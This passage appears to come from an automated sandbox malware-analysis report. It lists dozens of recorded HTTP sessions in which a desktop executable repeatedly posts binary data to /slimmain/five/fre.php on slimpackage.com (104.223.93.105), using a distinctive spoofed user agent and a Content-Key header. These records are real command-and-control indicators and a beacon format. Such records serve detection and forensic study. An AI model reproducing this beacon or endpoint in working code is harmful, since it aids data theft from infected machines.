                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.3 | 49745 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:24.618609905 CET | 1031 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:24.875466108 CET | 1031 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    20 | 192.168.2.3 | 49765 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:58.517148972 CET | 1175 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:58.772927046 CET | 1176 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:57 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    21 | 192.168.2.3 | 49766 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:00.494412899 CET | 1177 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:00.749394894 CET | 1178 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:59 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    22 | 192.168.2.3 | 49767 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:02.175263882 CET | 1178 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:02.432002068 CET | 1179 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:01 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    23 | 192.168.2.3 | 49769 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:04.821826935 CET | 1190 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:05.078097105 CET | 1191 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:04 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    24 | 192.168.2.3 | 49770 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:07.361011028 CET | 1192 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:07.622387886 CET | 1192 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:06 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    25 | 192.168.2.3 | 49771 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:08.948328972 CET | 1193 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:09.216919899 CET | 1194 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:08 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    26 | 192.168.2.3 | 49772 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:10.960978031 CET | 1195 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:11.313667059 CET | 1205 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:10 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    27 | 192.168.2.3 | 49781 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:12.466061115 CET | 1342 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:12.719638109 CET | 1346 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    28 | 192.168.2.3 | 49791 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:13.878221989 CET | 1518 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:14.138359070 CET | 1523 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    29 | 192.168.2.3 | 49809 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:17.178733110 CET | 2018 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:17.435230970 CET | 2019 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    3 | 192.168.2.3 | 49746 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:26.009494066 CET | 1032 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:26.305594921 CET | 1033 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:25 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    30 | 192.168.2.3 | 49810 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:20.254046917 CET | 2019 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:20.562068939 CET | 2020 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:19 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    31 | 192.168.2.3 | 49811 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:24.894113064 CET | 2021 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:25.157571077 CET | 2021 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:24 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    32 | 192.168.2.3 | 49817 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:27.413146019 CET | 4663 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:27.684449911 CET | 5953 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:26 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    33 | 192.168.2.3 | 49818 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:32.783225060 CET | 9938 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:33.072432041 CET | 9939 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:31 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    34 | 192.168.2.3 | 49819 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:35.615469933 CET | 9940 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:35.870157003 CET | 9940 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:34 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    35 | 192.168.2.3 | 49821 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:37.954643011 CET | 10743 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:38.208590984 CET | 10744 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:37 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    36 | 192.168.2.3 | 49822 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:40.432496071 CET | 10745 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:40.701186895 CET | 10748 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    37 | 192.168.2.3 | 49830 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:43.095140934 CET | 10761 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:43.349975109 CET | 10764 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    38 | 192.168.2.3 | 49837 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:44.516567945 CET | 10778 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:44.775058985 CET | 10781 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:43 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    39 | 192.168.2.3 | 49844 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:45.910084963 CET | 10794 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:46.169789076 CET | 10797 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    4 | 192.168.2.3 | 49747 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:27.434581995 CET | 1034 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:27.691371918 CET | 1034 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:26 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    40 | 192.168.2.3 | 49848 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:47.885916948 CET | 10802 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:48.140469074 CET | 10803 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:47 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    41 | 192.168.2.3 | 49849 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:50.027789116 CET | 10804 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:50.297445059 CET | 10804 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:49 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    42 | 192.168.2.3 | 49851 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:53.334038973 CET | 10810 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:53.614516973 CET | 10811 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    43 | 192.168.2.3 | 49852 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:55.488935947 CET | 10811 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:55.748456001 CET | 10812 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:54 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    44 | 192.168.2.3 | 49853 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:25:58.848829031 CET | 10813 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:59.150161028 CET | 10813 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:58 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    45 | 192.168.2.3 | 49854 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:01.825690031 CET | 10814 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:02.124898911 CET | 10815 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:01 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    46 | 192.168.2.3 | 49855 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:03.549432993 CET | 10816 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:03.807121038 CET | 10816 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:02 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    47 | 192.168.2.3 | 49856 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:05.020304918 CET | 10817 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:05.276611090 CET | 10818 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:04 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    48 | 192.168.2.3 | 49857 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:06.500273943 CET | 10819 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:06.756701946 CET | 10819 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
